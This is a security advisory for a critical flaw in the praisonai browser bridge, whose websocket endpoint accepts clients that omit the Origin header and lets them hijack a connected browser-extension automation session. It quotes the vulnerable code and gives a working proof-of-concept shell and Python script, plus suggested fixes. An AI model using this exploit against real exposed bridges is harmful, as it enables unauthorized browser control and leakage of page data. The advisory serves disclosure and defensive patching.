PT-2026-53560 · Pypi · Praisonaiagents

Published

2026-06-29

·

Updated

2026-06-29

CVSS v3.1

9.1

Critical

VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Summary

praisonai browser start exposes the browser bridge on 0.0.0.0 by default, and its /ws endpoint accepts websocket clients that omit the Origin header entirely. An unauthenticated network client can connect as a fake controller, send start session, cause the server to forward start automation to another connected browser-extension websocket, and receive the resulting action/status stream back over that hijacked session. This allows unauthorized remote use of a connected browser automation session without any credentials.

Details

The issue is in the browser bridge trust model. The code assumes that websocket peers are trusted local components, but that assumption is not enforced.
Relevant code paths:
  • Default network exposure: src/praisonai/praisonai/browser/server.py:38-44 and src/praisonai/praisonai/browser/cli.py:25-30
  • Optional-only origin validation: src/praisonai/praisonai/browser/server.py:156-173
  • Unauthenticated start session routing: src/praisonai/praisonai/browser/server.py:237-240 and src/praisonai/praisonai/browser/server.py:289-302
  • Cross-connection forwarding to any other idle websocket: src/praisonai/praisonai/browser/server.py:344-356
  • Broadcast of action output back to the initiating unauthenticated client: src/praisonai/praisonai/browser/server.py:412-423 and src/praisonai/praisonai/browser/server.py:462-476
The handshake logic only checks origin when an Origin header is present:
python
origin = websocket.headers.get("origin")
if origin:
  ...
  if not is allowed:
    await websocket.close(code=1008)
    return

await websocket.accept()
This means a non-browser client can omit Origin completely and still be accepted.
After that, any connected client can send {"type":"start session", ...}. The server then looks for the first other websocket without a session and sends it a start automation message:
python
if client conn != conn and client conn.websocket and not client conn.session id:
  await client conn.websocket.send text(json mod.dumps(start msg))
  client conn.session id = session id
  sent to extension = True
  break
When the extension-side connection responds with an observation, the resulting action is broadcast to every websocket with the same session id, including the unauthenticated initiating client:
python
action response = {
  "type": "action",
  "session id" : session id,
  **action,
}

for client id, client conn in self. connections.items():
  if client conn.session id == session id and client conn != conn:
    await client conn.websocket.send json(action response)
I verified this on the latest local checkout: praisonai version 4.5.134 at commit 365f75040f4e279736160f4b6bdb2bdb7a3968d4.

PoC

I used tmp/pocs/poc.sh to reproduce the issue from a clean local checkout.
Run:
bash
cd "/Users/r1zzg0d/Documents/CVE hunting/targets/PraisonAI"
./tmp/pocs/poc.sh
Expected vulnerable output:
text
[+] No-Origin client accepted: True
[+] Session forwarded to extension: True
[+] Action broadcast to attacker: True
[+] RESULT: VULNERABLE - unauthenticated client can hijack browser sessions.
Step-by-step reproduction:
  1. Start the local browser bridge from the checked-out source tree.
  2. Connect one websocket as a stand-in extension using a valid chrome-extension://<32-char-id> origin.
  3. Connect a second websocket with no Origin header.
  4. Send start session from the unauthenticated websocket.
  5. Observe that the server forwards start automation to the extension websocket.
  6. Send an observation from the extension websocket using the assigned session id.
  7. Observe that the resulting action and completion status are delivered back to the unauthenticated initiating websocket.
tmp/pocs/poc.sh:
sh
#!/bin/sh
 set -eu

SCRIPT DIR="$(CDPATH= cd -- "$(dirname -- "$0")" && pwd)"

cd "$SCRIPT DIR/../.."

exec uv run --no-project 
 --with fastapi 
 --with uvicorn 
 --with websockets 
 python3 "$SCRIPT DIR/poc.py"
tmp/pocs/poc.py:
python
#!/usr/bin/env python3
"""Verify unauthenticated browser-server session hijack on current source tree.

This PoC starts the BrowserServer from the local checkout, connects:
1. A fake extension client using an arbitrary chrome-extension Origin
2. An attacker client with no Origin header

It then shows the attacker can start a session that the server forwards to the
extension connection, and can receive the resulting action broadcast back over
that hijacked session.
"""

from  future  import annotations

import asyncio
import json
import os
 import socket
import sys
import tempfile
from pathlib import Path


REPO ROOT = Path( file ).resolve().parents[2]
SRC ROOT = REPO ROOT / "src" / "praisonai"
if str(SRC ROOT) not in sys.path:
  sys.path.insert(0, str(SRC ROOT))


 def pick port() -> int:
  with socket.socket(socket.AF INET, socket.SOCK STREAM) as sock:
    sock.bind(("127.0.0.1", 0))
    return sock.getsockname()[1]
 

class DummyBrowserAgent:
  """Minimal stub to avoid real LLM/browser dependencies during validation."""

  def  init (self, model: str, max steps: int, verbose: bool):
    self.model = model
    self.max steps = max steps
    self.verbose = verbose

  async def aprocess observation(self, message: dict) -> dict:
    return {
      "action": "done",
      "thought": f"processed: {message.get('url', '')}",
      "done": True,
      "summary": "dummy action generated",
    }


async def main() -> int:
  temp home = tempfile.TemporaryDirectory(prefix="praisonai-browser-poc-")
  os.environ["HOME"] = temp home.name

  from praisonai.browser.server import BrowserServer
  import praisonai.browser.agent as agent module
  import uvicorn
  import websockets

  agent module.BrowserAgent = DummyBrowserAgent

  port = pick port()
  server = BrowserServer(host="127.0.0.1", port=port, verbose=False)
  app = server. get app()

  config = uvicorn.Config(
    app,
    host="127.0.0.1",
    port=port,
    log level="error",
    access log=False,
  )
  uvicorn server = uvicorn.Server(config)
  server task = asyncio.create task(uvicorn server.serve())

  try:
    for  in range(50):
      if uvicorn server.started:
        break
      await asyncio.sleep(0.1)
    else:
      raise RuntimeError("Uvicorn server did not start in time")

    ws url = f"ws://127.0.0.1:{port}/ws"

    async with websockets.connect(
      ws url,
      origin="chrome-extension://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
    ) as extension ws:
      extension welcome = json.loads(await extension ws.recv())
      print("[+] Extension welcome:", extension welcome)

      async with websockets.connect(ws url) as attacker ws:
        attacker welcome = json.loads(await attacker ws.recv())
        print("[+] Attacker welcome:", attacker welcome)

        await attacker ws.send(
          json.dumps(
            {
              "type": "start session",
              "goal": "Open internal admin page and reveal secrets",
              "model": "dummy",
              "max steps": 1,
            }
          )
        )
        start response = json.loads(await attacker ws.recv())
        print("[+] Attacker start session response:", start response)

        hijacked msg = json.loads(await extension ws.recv())
        print("[+] Extension received forwarded message:", hijacked msg)

        session id = hijacked msg["session id"]
        await extension ws.send(
          json.dumps(
            {
              "type": "observation",
              "session id": session id,
              "step number" : 1,
              "url": "https://victim.example/internal",
              "elements": [{"selector": "#secret"}],
            }
          )
        )

        attacker action = json.loads(await attacker ws.recv())
        attacker status = json.loads(await attacker ws.recv())
        print("[+] Attacker received broadcast action:", attacker action)
        print("[+] Attacker received completion status:", attacker status)

        no origin client connected = attacker welcome.get("status") == "connected"
        forwarded to extension = hijacked msg.get("type") == "start automation"
        action broadcasted = (
          attacker action.get("type") == "action"
          and attacker action.get("session id") == session id
        )

        print("[+] No-Origin client accepted:", no origin client connected)
        print("[+] Session forwarded to extension:", forwarded to extension)
        print("[+] Action broadcast to attacker:", action broadcasted)

        if no origin client connected and forwarded to extension and action broadcasted:
          print("[+] RESULT: VULNERABLE - unauthenticated client can hijack browser sessions.")
          return 0

        print("[-] RESULT: NOT VULNERABLE")
        return 1
  finally:
    uvicorn server.should exit = True
    try:
      await asyncio.wait for(server task, timeout=5)
    except Exception:
      server task.cancel()
    temp home.cleanup()
 

if  name  == " main ":
  raise SystemExit(asyncio.run(main()))
tmp/pocs/poc.py starts a temporary local server, stubs the browser agent, opens both websocket roles, and prints the final vulnerability conditions explicitly.
PoC Video:

Impact

This is an unauthenticated remote-control vulnerability in the browser automation bridge. Any network client that can reach the exposed bridge can impersonate the controller side of the workflow, hijack an available connected extension session, and receive automation output from that hijacked session. In real deployments, this can allow unauthorized browser actions, misuse of model-backed automation, and leakage of sensitive page context or automation results.
Who is impacted:
  • Operators who run praisonai browser start with the default host binding
  • Users with an active connected browser extension session
  • Environments where the bridge is reachable from other hosts on the network

Recommended Fix

Suggested remediations:
  1. Require explicit authentication for every websocket client connecting to /ws.
  2. Reject websocket handshakes that omit Origin, unless they are using a separate authenticated localhost-only transport.
  3. Bind the browser bridge to 127.0.0.1 by default and require explicit operator opt-in for non-loopback exposure.
  4. Do not route start session to “the first other idle connection”; instead, pair authenticated controller and extension clients explicitly.

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

Related Identifiers

PYSEC-2026-485

Affected Products

Praisonaiagents